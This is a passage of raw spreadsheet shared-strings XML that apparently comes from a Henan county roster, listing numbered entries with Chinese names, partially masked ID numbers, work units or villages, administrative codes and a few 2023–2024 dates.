    <t>2334</t>
  </si>
  <si>
    <t>王保学</t>
  </si>
  <si>
    <t>2335</t>
  </si>
  <si>
    <t>冯永会</t>
  </si>
  <si>
    <t>2336</t>
  </si>
  <si>
    <t>张洪玲</t>
  </si>
  <si>
    <t>2337</t>
  </si>
  <si>
    <t>张春敏</t>
  </si>
  <si>
    <t>2338</t>
  </si>
  <si>
    <t>王运霞</t>
  </si>
  <si>
    <t>2339</t>
  </si>
  <si>
    <t>靳德玲</t>
  </si>
  <si>
    <t>2340</t>
  </si>
  <si>
    <t>康振会</t>
  </si>
  <si>
    <t>2341</t>
  </si>
  <si>
    <t>张延风</t>
  </si>
  <si>
    <t>2342</t>
  </si>
  <si>
    <t>杨云</t>
  </si>
  <si>
    <t>2343</t>
  </si>
  <si>
    <t>王金丽</t>
  </si>
  <si>
    <t>412921********2480</t>
  </si>
  <si>
    <t>2344</t>
  </si>
  <si>
    <t>王希荣</t>
  </si>
  <si>
    <t>2345</t>
  </si>
  <si>
    <t>王付伟</t>
  </si>
  <si>
    <t>2346</t>
  </si>
  <si>
    <t>王晴</t>
  </si>
  <si>
    <t>2347</t>
  </si>
  <si>
    <t>黄献瑞</t>
  </si>
  <si>
    <t>2348</t>
  </si>
  <si>
    <t>杨磊</t>
  </si>
  <si>
    <t>411326********2439</t>
  </si>
  <si>
    <t>2349</t>
  </si>
  <si>
    <t>张成安</t>
  </si>
  <si>
    <t>412921********2457</t>
  </si>
  <si>
    <t>2350</t>
  </si>
  <si>
    <t>陈振修</t>
  </si>
  <si>
    <t>4113210712</t>
  </si>
  <si>
    <t>2351</t>
  </si>
  <si>
    <t>冯中月</t>
  </si>
  <si>
    <t>2352</t>
  </si>
  <si>
    <t>王浩宇</t>
  </si>
  <si>
    <t>411321********2433</t>
  </si>
  <si>
    <t>2353</t>
  </si>
  <si>
    <t>仝运丽</t>
  </si>
  <si>
    <t>2354</t>
  </si>
  <si>
    <t>任雨荷</t>
  </si>
  <si>
    <t>4113210719</t>
  </si>
  <si>
    <t>2355</t>
  </si>
  <si>
    <t>张生现</t>
  </si>
  <si>
    <t>2356</t>
  </si>
  <si>
    <t>刘万德</t>
  </si>
  <si>
    <t>2357</t>
  </si>
  <si>
    <t>杨茂玲</t>
  </si>
  <si>
    <t>2358</t>
  </si>
  <si>
    <t>王莉</t>
  </si>
  <si>
    <t>2359</t>
  </si>
  <si>
    <t>李峰</t>
  </si>
  <si>
    <t>411326********2418</t>
  </si>
  <si>
    <t>2360</t>
  </si>
  <si>
    <t>王保梅</t>
  </si>
  <si>
    <t>2023年4月</t>
  </si>
  <si>
    <t>2361</t>
  </si>
  <si>
    <t>杨丽</t>
  </si>
  <si>
    <t>2362</t>
  </si>
  <si>
    <t>张明会</t>
  </si>
  <si>
    <t>2023年6月</t>
  </si>
  <si>
    <t>2363</t>
  </si>
  <si>
    <t>张贵珍</t>
  </si>
  <si>
    <t>2364</t>
  </si>
  <si>
    <t>贺宝贵</t>
  </si>
  <si>
    <t>2365</t>
  </si>
  <si>
    <t>梁晶晶</t>
  </si>
  <si>
    <t>411321********5885</t>
  </si>
  <si>
    <t>2366</t>
  </si>
  <si>
    <t>张继山</t>
  </si>
  <si>
    <t>2367</t>
  </si>
  <si>
    <t>2368</t>
  </si>
  <si>
    <t>王一平</t>
  </si>
  <si>
    <t>411326********244X</t>
  </si>
  <si>
    <t>2369</t>
  </si>
  <si>
    <t>付贵兰</t>
  </si>
  <si>
    <t>2370</t>
  </si>
  <si>
    <t>长江厂</t>
  </si>
  <si>
    <t>闫小丽</t>
  </si>
  <si>
    <t>2371</t>
  </si>
  <si>
    <t>陈盈</t>
  </si>
  <si>
    <t>411326********2437</t>
  </si>
  <si>
    <t>2372</t>
  </si>
  <si>
    <t>李风南</t>
  </si>
  <si>
    <t>2373</t>
  </si>
  <si>
    <t>董舒娜</t>
  </si>
  <si>
    <t>2374</t>
  </si>
  <si>
    <t>李渴洒</t>
  </si>
  <si>
    <t>411321********242X</t>
  </si>
  <si>
    <t>2375</t>
  </si>
  <si>
    <t>朱东奇</t>
  </si>
  <si>
    <t>2376</t>
  </si>
  <si>
    <t>孟凡刚</t>
  </si>
  <si>
    <t>412921********2437</t>
  </si>
  <si>
    <t>2377</t>
  </si>
  <si>
    <t>孟祥成</t>
  </si>
  <si>
    <t>411326********2412</t>
  </si>
  <si>
    <t>2378</t>
  </si>
  <si>
    <t>张存荣</t>
  </si>
  <si>
    <t>2379</t>
  </si>
  <si>
    <t>周保传</t>
  </si>
  <si>
    <t>2380</t>
  </si>
  <si>
    <t>张艳玲</t>
  </si>
  <si>
    <t>2381</t>
  </si>
  <si>
    <t>刘红卫</t>
  </si>
  <si>
    <t>2382</t>
  </si>
  <si>
    <t>付中升</t>
  </si>
  <si>
    <t>2383</t>
  </si>
  <si>
    <t>吴志清</t>
  </si>
  <si>
    <t>2384</t>
  </si>
  <si>
    <t>吴文钊</t>
  </si>
  <si>
    <t>411321********0432</t>
  </si>
  <si>
    <t>2385</t>
  </si>
  <si>
    <t>万毅</t>
  </si>
  <si>
    <t>2386</t>
  </si>
  <si>
    <t>李大红</t>
  </si>
  <si>
    <t>2387</t>
  </si>
  <si>
    <t>任保梅</t>
  </si>
  <si>
    <t>2388</t>
  </si>
  <si>
    <t>甘会晓</t>
  </si>
  <si>
    <t>412921********2432</t>
  </si>
  <si>
    <t>2389</t>
  </si>
  <si>
    <t>关世勇</t>
  </si>
  <si>
    <t>411321********2418</t>
  </si>
  <si>
    <t>2390</t>
  </si>
  <si>
    <t>关丰琪</t>
  </si>
  <si>
    <t>411321********0726</t>
  </si>
  <si>
    <t>2391</t>
  </si>
  <si>
    <t>郑兴春</t>
  </si>
  <si>
    <t>412921********1569</t>
  </si>
  <si>
    <t>2392</t>
  </si>
  <si>
    <t>刘建君</t>
  </si>
  <si>
    <t>411321********1554</t>
  </si>
  <si>
    <t>2393</t>
  </si>
  <si>
    <t>蔡庆军</t>
  </si>
  <si>
    <t>2394</t>
  </si>
  <si>
    <t>卫生院</t>
  </si>
  <si>
    <t>崔瑞峰</t>
  </si>
  <si>
    <t>2395</t>
  </si>
  <si>
    <t>汪浩</t>
  </si>
  <si>
    <t>411326********2457</t>
  </si>
  <si>
    <t>2396</t>
  </si>
  <si>
    <t>水泥厂</t>
  </si>
  <si>
    <t>任栓超</t>
  </si>
  <si>
    <t>411321********243X</t>
  </si>
  <si>
    <t>411321071405</t>
  </si>
  <si>
    <t>2397</t>
  </si>
  <si>
    <t>吴汶钊</t>
  </si>
  <si>
    <t>411321********241X</t>
  </si>
  <si>
    <t>2398</t>
  </si>
  <si>
    <t>吴远昊</t>
  </si>
  <si>
    <t>411321********0254</t>
  </si>
  <si>
    <t>2399</t>
  </si>
  <si>
    <t>贾锋</t>
  </si>
  <si>
    <t>2400</t>
  </si>
  <si>
    <t>翟朝凤</t>
  </si>
  <si>
    <t>2401</t>
  </si>
  <si>
    <t>闫宾</t>
  </si>
  <si>
    <t>2402</t>
  </si>
  <si>
    <t>杨晓丽</t>
  </si>
  <si>
    <t>2403</t>
  </si>
  <si>
    <t>张凡文</t>
  </si>
  <si>
    <t>2404</t>
  </si>
  <si>
    <t>任行敏</t>
  </si>
  <si>
    <t>2405</t>
  </si>
  <si>
    <t>东风厂</t>
  </si>
  <si>
    <t>朱磊</t>
  </si>
  <si>
    <t>4113210704</t>
  </si>
  <si>
    <t>2406</t>
  </si>
  <si>
    <t>孙召</t>
  </si>
  <si>
    <t>2407</t>
  </si>
  <si>
    <t>孙均阁</t>
  </si>
  <si>
    <t>2408</t>
  </si>
  <si>
    <t>王林甫</t>
  </si>
  <si>
    <t>2409</t>
  </si>
  <si>
    <t>葛荣伟</t>
  </si>
  <si>
    <t>2410</t>
  </si>
  <si>
    <t>杨涵森</t>
  </si>
  <si>
    <t>411321********2411</t>
  </si>
  <si>
    <t>2411</t>
  </si>
  <si>
    <t>王付香</t>
  </si>
  <si>
    <t>2412</t>
  </si>
  <si>
    <t>刘兴兰</t>
  </si>
  <si>
    <t>2413</t>
  </si>
  <si>
    <t>张广荣</t>
  </si>
  <si>
    <t>2414</t>
  </si>
  <si>
    <t>周明</t>
  </si>
  <si>
    <t>2415</t>
  </si>
  <si>
    <t>毕文江</t>
  </si>
  <si>
    <t>2416</t>
  </si>
  <si>
    <t>王丰超</t>
  </si>
  <si>
    <t>411326********2414</t>
  </si>
  <si>
    <t>2417</t>
  </si>
  <si>
    <t>尚璨</t>
  </si>
  <si>
    <t>411321070401</t>
  </si>
  <si>
    <t>2418</t>
  </si>
  <si>
    <t>张桂军</t>
  </si>
  <si>
    <t>2419</t>
  </si>
  <si>
    <t>段琼</t>
  </si>
  <si>
    <t>411321070403</t>
  </si>
  <si>
    <t>2420</t>
  </si>
  <si>
    <t>王保成</t>
  </si>
  <si>
    <t>412921********249X</t>
  </si>
  <si>
    <t>2421</t>
  </si>
  <si>
    <t>吕全丽</t>
  </si>
  <si>
    <t>2024年2月</t>
  </si>
  <si>
    <t>2422</t>
  </si>
  <si>
    <t>刘淑霞</t>
  </si>
  <si>
    <t>2423</t>
  </si>
  <si>
    <t>冯军武</t>
  </si>
  <si>
    <t>411326********2431</t>
  </si>
  <si>
    <t>2424</t>
  </si>
  <si>
    <t>罗超</t>
  </si>
  <si>
    <t>2425</t>
  </si>
  <si>
    <t>石门乡</t>
  </si>
  <si>
    <t>朱凡雨</t>
  </si>
  <si>
    <t>412921********3645</t>
  </si>
  <si>
    <t>4113210920</t>
  </si>
  <si>
    <t>2426</t>
  </si>
  <si>
    <t>刘炳楠</t>
  </si>
  <si>
    <t>411326********3339</t>
  </si>
  <si>
    <t>2427</t>
  </si>
  <si>
    <t>刘炳辉</t>
  </si>
  <si>
    <t>411321********0151</t>
  </si>
  <si>
    <t>2428</t>
  </si>
  <si>
    <t>胡长敏</t>
  </si>
  <si>
    <t>412921********3329</t>
  </si>
  <si>
    <t>2429</t>
  </si>
  <si>
    <t>马肖</t>
  </si>
  <si>
    <t>411326********3340</t>
  </si>
  <si>
    <t>2430</t>
  </si>
  <si>
    <t>黄振昌</t>
  </si>
  <si>
    <t>411326********3493</t>
  </si>
  <si>
    <t>2431</t>
  </si>
  <si>
    <t>粮食局</t>
  </si>
  <si>
    <t>郭国元</t>
  </si>
  <si>
    <t>2432</t>
  </si>
  <si>
    <t>胡群</t>
  </si>
  <si>
    <t>412921********3335</t>
  </si>
  <si>
    <t>2433</t>
  </si>
  <si>
    <t>郑婉娜</t>
  </si>
  <si>
    <t>412902********2302</t>
  </si>
  <si>
    <t>2434</t>
  </si>
  <si>
    <t>杨庆旺</t>
  </si>
  <si>
    <t>410304********0515</t>
  </si>
  <si>
    <t>2435</t>
  </si>
  <si>
    <t>杨召静</t>
  </si>
  <si>
    <t>411326********3645</t>
  </si>
  <si>
    <t>2436</t>
  </si>
  <si>
    <t>黄海</t>
  </si>
  <si>
    <t>411326********3338</t>
  </si>
  <si>
    <t>2437</t>
  </si>
  <si>
    <t>黄廷伟</t>
  </si>
  <si>
    <t>2438</t>
  </si>
  <si>
    <t>罗飞</t>
  </si>
  <si>
    <t>412921********3325</t>
  </si>
  <si>
    <t>41132109</t>
  </si>
  <si>
    <t>2439</t>
  </si>
  <si>
    <t>电管所</t>
  </si>
  <si>
    <t>张钦泽</t>
  </si>
  <si>
    <t>411321********567X</t>
  </si>
  <si>
    <t>2440</t>
  </si>
  <si>
    <t>张含依</t>
  </si>
  <si>
    <t>411321********3324</t>
  </si>
  <si>
    <t>2441</t>
  </si>
  <si>
    <t>四棵树乡</t>
  </si>
  <si>
    <t>闫中霞</t>
  </si>
  <si>
    <t>412921********4023</t>
  </si>
  <si>
    <t>4113211125</t>
  </si>
  <si>
    <t>2442</t>
  </si>
  <si>
    <t>黄运甫</t>
  </si>
  <si>
    <t>412921********4039</t>
  </si>
  <si>
    <t>2443</t>
  </si>
  <si>
    <t>李贵荣</t>
  </si>
  <si>
    <t>412921********4026</t>
  </si>
  <si>
    <t>2444</t>
  </si>
  <si>
    <t>田子庆</t>
  </si>
  <si>
    <t>412921********4015</t>
  </si>
  <si>
    <t>2445</t>
  </si>
  <si>
    <t>翟文良</t>
  </si>
  <si>
    <t>412921********4012</t>
  </si>
  <si>
    <t>2446</t>
  </si>
  <si>
    <t>田华苗</t>
  </si>
  <si>
    <t>412921********4044</t>
  </si>
  <si>
    <t>2447</t>
  </si>
  <si>
    <t>翟建皓</t>
  </si>
  <si>
    <t>411321********4038</t>
  </si>
  <si>
    <t>2448</t>
  </si>
  <si>
    <t>田广瑞</t>
  </si>
  <si>
    <t>412921********4055</t>
  </si>
  <si>
    <t>2449</t>
  </si>
  <si>
    <t>2450</t>
  </si>
  <si>
    <t>李德群</t>
  </si>
  <si>
    <t>412921********4034</t>
  </si>
  <si>
    <t>2451</t>
  </si>
  <si>
    <t>陈贞莲</t>
  </si>
  <si>
    <t>412921********4020</t>
  </si>
  <si>
    <t>2452</t>
  </si>
  <si>
    <t>杨付全</t>
  </si>
  <si>
    <t>412921********4014</t>
  </si>
  <si>
    <t>2453</t>
  </si>
  <si>
    <t>翟成云</t>
  </si>
  <si>
    <t>412921********4089</t>
  </si>
  <si>
    <t>2454</t>
  </si>
  <si>
    <t>杨祥云</t>
  </si>
  <si>
    <t>411321********485X</t>
  </si>
  <si>
    <t>2455</t>
  </si>
  <si>
    <t>陈正霞</t>
  </si>
  <si>
    <t>412921********4021</t>
  </si>
  <si>
    <t>2456</t>
  </si>
  <si>
    <t>田子玲</t>
  </si>
  <si>
    <t>2457</t>
  </si>
  <si>
    <t>田子献</t>
  </si>
  <si>
    <t>412921********4096</t>
  </si>
  <si>
    <t>2458</t>
  </si>
  <si>
    <t>李廷芳</t>
  </si>
  <si>
    <t>2459</t>
  </si>
  <si>
    <t>李德朝</t>
  </si>
  <si>
    <t>412921********4010</t>
  </si>
  <si>
    <t>2460</t>
  </si>
  <si>
    <t>张庆玲</t>
  </si>
  <si>
    <t>411326********4065</t>
  </si>
  <si>
    <t>2461</t>
  </si>
  <si>
    <t>田广林</t>
  </si>
  <si>
    <t>412921********4013</t>
  </si>
  <si>
    <t>2462</t>
  </si>
  <si>
    <t>王清芳</t>
  </si>
  <si>
    <t>412921********4029</t>
  </si>
  <si>
    <t>2463</t>
  </si>
  <si>
    <t>田广新</t>
  </si>
  <si>
    <t>412921********4083</t>
  </si>
  <si>
    <t>2464</t>
  </si>
  <si>
    <t>黄振海</t>
  </si>
  <si>
    <t>2465</t>
  </si>
  <si>
    <t>张荣芳</t>
  </si>
  <si>
    <t>412921********4045</t>
  </si>
  <si>
    <t>2466</t>
  </si>
  <si>
    <t>田广京</t>
  </si>
  <si>
    <t>412921********4018</t>
  </si>
  <si>
    <t>2467</t>
  </si>
  <si>
    <t>赵霞</t>
  </si>
  <si>
    <t>2468</t>
  </si>
  <si>
    <t>王荣</t>
  </si>
  <si>
    <t>412921********4060</t>
  </si>
  <si>
    <t>4113211124</t>
  </si>
  <si>
    <t>2469</t>
  </si>
  <si>
    <t>杨付有</t>
  </si>
  <si>
    <t>412921********4058</t>
  </si>
  <si>
    <t>2470</t>
  </si>
  <si>
    <t>席天玉</t>
  </si>
  <si>
    <t>2471</t>
  </si>
  <si>
    <t>黄秀梅</t>
  </si>
  <si>
    <t>412921********4067</t>
  </si>
  <si>
    <t>2472</t>
  </si>
  <si>
    <t>崔长梅</t>
  </si>
  <si>
    <t>2473</t>
  </si>
  <si>
    <t>李瑞娟</t>
  </si>
  <si>
    <t>412921********0623</t>
  </si>
  <si>
    <t>2474</t>
  </si>
  <si>
    <t>张建鹏</t>
  </si>
  <si>
    <t>2475</t>
  </si>
  <si>
    <t>杨贵兰</t>
  </si>
  <si>
    <t>412921********4022</t>
  </si>
  <si>
    <t>2476</t>
  </si>
  <si>
    <t>黄天春</t>
  </si>
  <si>
    <t>2477</t>
  </si>
  <si>
    <t>杨寿华</t>
  </si>
  <si>
    <t>412921********4063</t>
  </si>
  <si>
    <t>2478</t>
  </si>
  <si>
    <t>412921********402X</t>
  </si>
  <si>
    <t>2479</t>
  </si>
  <si>
    <t xml:space="preserve">田舒飒 </t>
  </si>
  <si>
    <t>411326********4029</t>
  </si>
  <si>
    <t>2480</t>
  </si>
  <si>
    <t>高书梅</t>
  </si>
  <si>
    <t>412921********4107</t>
  </si>
  <si>
    <t>2481</t>
  </si>
  <si>
    <t>薛传勤</t>
  </si>
  <si>
    <t>412921********4127</t>
  </si>
  <si>
    <t>2482</t>
  </si>
  <si>
    <t>田广政</t>
  </si>
  <si>
    <t>2483</t>
  </si>
  <si>
    <t>张兆生</t>
  </si>
  <si>
    <t>2484</t>
  </si>
  <si>
    <t>田广霞</t>
  </si>
  <si>
    <t>2485</t>
  </si>
  <si>
    <t>贺业青</t>
  </si>
  <si>
    <t>2486</t>
  </si>
  <si>
    <t>宋学勤</t>
  </si>
  <si>
    <t>2487</t>
  </si>
  <si>
    <t>李荣义</t>
  </si>
  <si>
    <t>412921********4037</t>
  </si>
  <si>
    <t>2488</t>
  </si>
  <si>
    <t>张建娥</t>
  </si>
  <si>
    <t>412921********4066</t>
  </si>
  <si>
    <t>2489</t>
  </si>
  <si>
    <t>张新林</t>
  </si>
  <si>
    <t>412921********4019</t>
  </si>
  <si>
    <t>2490</t>
  </si>
  <si>
    <t>朱晓灵</t>
  </si>
  <si>
    <t>2491</t>
  </si>
  <si>
    <t>田广杰</t>
  </si>
  <si>
    <t>2492</t>
  </si>
  <si>
    <t>渠营</t>
  </si>
  <si>
    <t>412901********0503</t>
  </si>
  <si>
    <t>4113211105</t>
  </si>
  <si>
    <t>2493</t>
  </si>
  <si>
    <t>翟文玲</t>
  </si>
  <si>
    <t>2494</t>
  </si>
  <si>
    <t>杨勇</t>
  </si>
  <si>
    <t>2495</t>
  </si>
  <si>
    <t>廖敬雷</t>
  </si>
  <si>
    <t>411326********4039</t>
  </si>
  <si>
    <t>2496</t>
  </si>
  <si>
    <t>王霞</t>
  </si>
  <si>
    <t>2497</t>
  </si>
  <si>
    <t>孙运明</t>
  </si>
  <si>
    <t>412921********401X</t>
  </si>
  <si>
    <t>2498</t>
  </si>
  <si>
    <t>杨新转</t>
  </si>
  <si>
    <t>2499</t>
  </si>
  <si>
    <t>赵玉林</t>
  </si>
  <si>
    <t>2500</t>
  </si>
  <si>
    <t>张庆昌</t>
  </si>
  <si>
    <t>412921********3635</t>
  </si>
  <si>
    <t>2501</t>
  </si>
  <si>
    <t>黄鑫雨</t>
  </si>
  <si>
    <t>411326********4036</t>
  </si>
  <si>
    <t>2502</t>
  </si>
  <si>
    <t>蚕业局</t>
  </si>
  <si>
    <t>郝秋伟</t>
  </si>
  <si>
    <t>412921********4033</t>
  </si>
  <si>
    <t>2503</t>
  </si>
  <si>
    <t>赵怀广</t>
  </si>
  <si>
    <t>412921********4077</t>
  </si>
  <si>
    <t>2504</t>
  </si>
  <si>
    <t>席天玲</t>
  </si>
  <si>
    <t>412921********4125</t>
  </si>
  <si>
    <t>2505</t>
  </si>
  <si>
    <t>齐森</t>
  </si>
  <si>
    <t>411326********4017</t>
  </si>
  <si>
    <t>2506</t>
  </si>
  <si>
    <t>赵国基</t>
  </si>
  <si>
    <t>2507</t>
  </si>
  <si>
    <t>赵烜</t>
  </si>
  <si>
    <t>411321********4014</t>
  </si>
  <si>
    <t>2508</t>
  </si>
  <si>
    <t>2509</t>
  </si>
  <si>
    <t>瓦渣岭</t>
  </si>
  <si>
    <t>叶光</t>
  </si>
  <si>
    <t>4113211120</t>
  </si>
  <si>
    <t>2510</t>
  </si>
  <si>
    <t>疙瘩坡村</t>
  </si>
  <si>
    <t>张雅迪</t>
  </si>
  <si>
    <t>411321********0328</t>
  </si>
  <si>
    <t>4113211119</t>
  </si>
  <si>
    <t>2511</t>
  </si>
  <si>
    <t>翟传飞</t>
  </si>
  <si>
    <t>2512</t>
  </si>
  <si>
    <t>外贸局</t>
  </si>
  <si>
    <t>2513</t>
  </si>
  <si>
    <t>南河店镇</t>
  </si>
  <si>
    <t>王满瑞</t>
  </si>
  <si>
    <t>412921********3666</t>
  </si>
  <si>
    <t>4113211003</t>
  </si>
  <si>
    <t>2514</t>
  </si>
  <si>
    <t>412921********3649</t>
  </si>
  <si>
    <t>4113211004</t>
  </si>
  <si>
    <t>2515</t>
  </si>
  <si>
    <t>韩付芝</t>
  </si>
  <si>
    <t>2516</t>
  </si>
  <si>
    <t>孙运果</t>
  </si>
  <si>
    <t>412921********3615</t>
  </si>
  <si>
    <t>2517</t>
  </si>
  <si>
    <t>孙建勋</t>
  </si>
  <si>
    <t>411321********3614</t>
  </si>
  <si>
    <t>2518</t>
  </si>
  <si>
    <t>王景珩</t>
  </si>
  <si>
    <t>411322********0159</t>
  </si>
  <si>
    <t>2519</t>
  </si>
  <si>
    <t>毛金生</t>
  </si>
  <si>
    <t>4113211014</t>
  </si>
  <si>
    <t>2520</t>
  </si>
  <si>
    <t>李敬霞</t>
  </si>
  <si>
    <t>412921********3621</t>
  </si>
  <si>
    <t>2521</t>
  </si>
  <si>
    <t>李红依</t>
  </si>
  <si>
    <t>411321********3648</t>
  </si>
  <si>
    <t>2522</t>
  </si>
  <si>
    <t>杨书荣</t>
  </si>
  <si>
    <t>412921********3643</t>
  </si>
  <si>
    <t>2523</t>
  </si>
  <si>
    <t>蚕厂家属院</t>
  </si>
  <si>
    <t>翟世丽</t>
  </si>
  <si>
    <t>412921********0465</t>
  </si>
  <si>
    <t>4113211009</t>
  </si>
  <si>
    <t>2524</t>
  </si>
  <si>
    <t>焦刚</t>
  </si>
  <si>
    <t>2525</t>
  </si>
  <si>
    <t>焦治原</t>
  </si>
  <si>
    <t>411326********3615</t>
  </si>
  <si>
    <t>2526</t>
  </si>
  <si>
    <t>张庆恒</t>
  </si>
  <si>
    <t>412921********3652</t>
  </si>
  <si>
    <t>2527</t>
  </si>
  <si>
    <t>李琛</t>
  </si>
  <si>
    <t>412921********3613</t>
  </si>
  <si>
    <t>4113211007</t>
  </si>
  <si>
    <t>2528</t>
  </si>
  <si>
    <t>李月</t>
  </si>
  <si>
    <t>2529</t>
  </si>
  <si>
    <t>李建</t>
  </si>
  <si>
    <t>412921********3630</t>
  </si>
  <si>
    <t>2530</t>
  </si>
  <si>
    <t>李长健</t>
  </si>
  <si>
    <t>2531</t>
  </si>
  <si>
    <t>杨德荣</t>
  </si>
  <si>
    <t>412921********362X</t>
  </si>
  <si>
    <t>2532</t>
  </si>
  <si>
    <t>孙运超</t>
  </si>
  <si>
    <t>412921********0232</t>
  </si>
  <si>
    <t>2533</t>
  </si>
  <si>
    <t>张广东</t>
  </si>
  <si>
    <t>412921********3612</t>
  </si>
  <si>
    <t>2534</t>
  </si>
  <si>
    <t>张世豪</t>
  </si>
  <si>
    <t>2535</t>
  </si>
  <si>
    <t>刘长贵</t>
  </si>
  <si>
    <t>2536</t>
  </si>
  <si>
    <t>张建业</t>
  </si>
  <si>
    <t>412921********365X</t>
  </si>
  <si>
    <t>2537</t>
  </si>
  <si>
    <t>郝秋丽</t>
  </si>
  <si>
    <t>2538</t>
  </si>
  <si>
    <t>马旭</t>
  </si>
  <si>
    <t>2539</t>
  </si>
  <si>
    <t>姬雅卓</t>
  </si>
  <si>
    <t>411326********0046</t>
  </si>
  <si>
    <t>2540</t>
  </si>
  <si>
    <t>马荣品</t>
  </si>
  <si>
    <t>412921********3669</t>
  </si>
  <si>
    <t>2541</t>
  </si>
  <si>
    <t>柴姣红</t>
  </si>
  <si>
    <t>2542</t>
  </si>
  <si>
    <t>韩国强</t>
  </si>
  <si>
    <t>412921********3795</t>
  </si>
  <si>
    <t>2543</t>
  </si>
  <si>
    <t>巩伟</t>
  </si>
  <si>
    <t>2544</t>
  </si>
  <si>
    <t>杨冰</t>
  </si>
  <si>
    <t>2545</t>
  </si>
  <si>
    <t>杨晓宇</t>
  </si>
  <si>
    <t>411321********362X</t>
  </si>
  <si>
    <t>2546</t>
  </si>
  <si>
    <t>卫生局</t>
  </si>
  <si>
    <t>张全芳</t>
  </si>
  <si>
    <t>412921********3622</t>
  </si>
  <si>
    <t>2547</t>
  </si>
  <si>
    <t>工信局</t>
  </si>
  <si>
    <t>胡进明</t>
  </si>
  <si>
    <t>412921********361X</t>
  </si>
  <si>
    <t>2548</t>
  </si>
  <si>
    <t>朱保彦</t>
  </si>
  <si>
    <t>2549</t>
  </si>
  <si>
    <t>李泉</t>
  </si>
  <si>
    <t>412921********3632</t>
  </si>
  <si>
    <t>2550</t>
  </si>
  <si>
    <t>邢远朝</t>
  </si>
  <si>
    <t>2551</t>
  </si>
  <si>
    <t>赵天超</t>
  </si>
  <si>
    <t>4113211001</t>
  </si>
  <si>
    <t>2552</t>
  </si>
  <si>
    <t>宰来均</t>
  </si>
  <si>
    <t>412921********3617</t>
  </si>
  <si>
    <t>2553</t>
  </si>
  <si>
    <t>武建</t>
  </si>
  <si>
    <t>412921********4813</t>
  </si>
  <si>
    <t>4113211020</t>
  </si>
  <si>
    <t>2554</t>
  </si>
  <si>
    <t>李金秋</t>
  </si>
  <si>
    <t>412921********3627</t>
  </si>
  <si>
    <t>2555</t>
  </si>
  <si>
    <t>王立</t>
  </si>
  <si>
    <t>412921********3654</t>
  </si>
  <si>
    <t>2556</t>
  </si>
  <si>
    <t>苗莺兰</t>
  </si>
  <si>
    <t>412921********3624</t>
  </si>
  <si>
    <t>2557</t>
  </si>
  <si>
    <t>412921********3633</t>
  </si>
  <si>
    <t>2558</t>
  </si>
  <si>
    <t>马哲欣</t>
  </si>
  <si>
    <t>2559</t>
  </si>
  <si>
    <t>王新华</t>
  </si>
  <si>
    <t>2560</t>
  </si>
  <si>
    <t>马春雨</t>
  </si>
  <si>
    <t>411326********0105</t>
  </si>
  <si>
    <t>2561</t>
  </si>
  <si>
    <t>贺振邦</t>
  </si>
  <si>
    <t>412921********4410</t>
  </si>
  <si>
    <t>2562</t>
  </si>
  <si>
    <t>李永法</t>
  </si>
  <si>
    <t>412921********3678</t>
  </si>
  <si>
    <t>2563</t>
  </si>
  <si>
    <t>曾祥付</t>
  </si>
  <si>
    <t>411326********375X</t>
  </si>
  <si>
    <t>2564</t>
  </si>
  <si>
    <t>高杨</t>
  </si>
  <si>
    <t>2565</t>
  </si>
  <si>
    <t>祖克锗</t>
  </si>
  <si>
    <t>411324********001X</t>
  </si>
  <si>
    <t>2566</t>
  </si>
  <si>
    <t>王文三</t>
  </si>
  <si>
    <t>2567</t>
  </si>
  <si>
    <t>李勇</t>
  </si>
  <si>
    <t>412921********3636</t>
  </si>
  <si>
    <t>2568</t>
  </si>
  <si>
    <t>李兵</t>
  </si>
  <si>
    <t>412921********3658</t>
  </si>
  <si>
    <t>2569</t>
  </si>
  <si>
    <t>赵国</t>
  </si>
  <si>
    <t>2570</t>
  </si>
  <si>
    <t>赵峻皓</t>
  </si>
  <si>
    <t>411321********365X</t>
  </si>
  <si>
    <t>2571</t>
  </si>
  <si>
    <t>卫心同</t>
  </si>
  <si>
    <t>2572</t>
  </si>
  <si>
    <t>牛付春</t>
  </si>
  <si>
    <t>412921********4439</t>
  </si>
  <si>
    <t>4113211005</t>
  </si>
  <si>
    <t>2573</t>
  </si>
  <si>
    <t>马良伟</t>
  </si>
  <si>
    <t>412921********4457</t>
  </si>
  <si>
    <t>2574</t>
  </si>
  <si>
    <t>姬明粮</t>
  </si>
  <si>
    <t>2575</t>
  </si>
  <si>
    <t>物资局</t>
  </si>
  <si>
    <t>尚德京</t>
  </si>
  <si>
    <t>4113211018</t>
  </si>
  <si>
    <t>2576</t>
  </si>
  <si>
    <t>甘广东</t>
  </si>
  <si>
    <t>2023年10月</t>
  </si>
  <si>
    <t>2577</t>
  </si>
  <si>
    <t>张林林</t>
  </si>
  <si>
    <t>2578</t>
  </si>
  <si>
    <t>张栋威</t>
  </si>
  <si>
    <t>411321********3637</t>
  </si>
  <si>
    <t>2579</t>
  </si>
  <si>
    <t>张紫雯</t>
  </si>
  <si>
    <t>411321********3629</t>
  </si>
  <si>
    <t>2580</t>
  </si>
  <si>
    <t>钾长石矿</t>
  </si>
  <si>
    <t>曾凡群</t>
  </si>
  <si>
    <t>2581</t>
  </si>
  <si>
    <t>侯明森</t>
  </si>
  <si>
    <t>2582</t>
  </si>
  <si>
    <t>医药部</t>
  </si>
  <si>
    <t>王净远</t>
  </si>
  <si>
    <t>2583</t>
  </si>
  <si>
    <t>赵丽</t>
  </si>
  <si>
    <t>411326********4024</t>
  </si>
  <si>
    <t>2584</t>
  </si>
  <si>
    <t>南河店镇范庄村</t>
  </si>
  <si>
    <t>边峰</t>
  </si>
  <si>
    <t>411321********3655</t>
  </si>
  <si>
    <t>2585</t>
  </si>
  <si>
    <t>边俊博</t>
  </si>
  <si>
    <t>411321********3657</t>
  </si>
  <si>
    <t>2586</t>
  </si>
  <si>
    <t>农机配件厂</t>
  </si>
  <si>
    <t>邢远贞</t>
  </si>
  <si>
    <t>412921********445X</t>
  </si>
  <si>
    <t>2587</t>
  </si>
  <si>
    <t>贺华</t>
  </si>
  <si>
    <t>412921********3705</t>
  </si>
  <si>
    <t>2588</t>
  </si>
  <si>
    <t>全小强</t>
  </si>
  <si>
    <t>2589</t>
  </si>
  <si>
    <t>白土岗镇</t>
  </si>
  <si>
    <t>马玉祥</t>
  </si>
  <si>
    <t>411321********441X</t>
  </si>
  <si>
    <t>411321122001</t>
  </si>
  <si>
    <t>2590</t>
  </si>
  <si>
    <t>李丰昌</t>
  </si>
  <si>
    <t>412921********4453</t>
  </si>
  <si>
    <t>2591</t>
  </si>
  <si>
    <t>张居军</t>
  </si>
  <si>
    <t>412921********4417</t>
  </si>
  <si>
    <t>2592</t>
  </si>
  <si>
    <t>吴太平</t>
